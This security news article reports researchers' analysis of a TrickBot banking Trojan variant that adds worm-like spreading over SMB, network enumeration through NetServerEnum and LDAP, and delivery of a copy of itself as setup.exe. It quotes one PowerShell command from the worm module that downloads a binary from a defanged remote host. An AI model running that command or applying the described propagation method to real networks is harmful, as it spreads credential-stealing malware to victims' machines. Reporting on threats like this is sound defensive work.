Banking Trojan TrickBot uses self-spreading like WannaCry

Security researchers have now discovered a group of cyber criminals that are attempting to give its banking Trojan Trickbot  the self-spreading worm-like capabilities that made recent ransomware attacks go worldwide.

The new version of credential stealing TrickBot banking Trojan, known as “1000029” (v24), has been found using the Windows Server Message Block (SMB)—that allowed WannaCry and Petya to spread across the world quickly.

TrickBot is a banking Trojan malware that has been targeting financial institutions across the world since last year.

The Trojan generally spreads via email attachments impersonating invoices from a large unnamed “international financial institution,” but actually leads victims to a fake login page used to steal credentials.

The researchers at FlashPoint have discovered that the Trickbot gang appears to be testing a worm-like malware propagation module, which appears to spread locally via Server Message Block (SMB), scan domains for lists of servers via NetServerEnum Windows API, and enumerate other computers via Lightweight Directory Access Protocol (LDAP) enumeration.
The new TrickBot variant can also be disguised as ‘setup.exe’ and delivered through a PowerShell script to spread through interprocess communication and download additional version of TrickBot onto shared drives.

The Trickbot’s “MachineFinder” and “netscan” functions appear to leverage the following techniques:

• NetServer Enumeration function

• LDAP Enumeration

More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.

The malware appears to leverage the IPC (interprocess communication) share to propagate and execute a PowerShell script as a final payload to download another Trickbot malware, masked as “setup[.]exe,” into the shared drive.

The following PowerShell script was observed in the worm module:

powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”

In order to safeguard against such malware infection, you should always be suspicious of unwanted files and documents sent over an email and should never click on links inside them unless verifying the source and also make sure that you run an effective anti-virus security suite on your system, and keep it up-to-date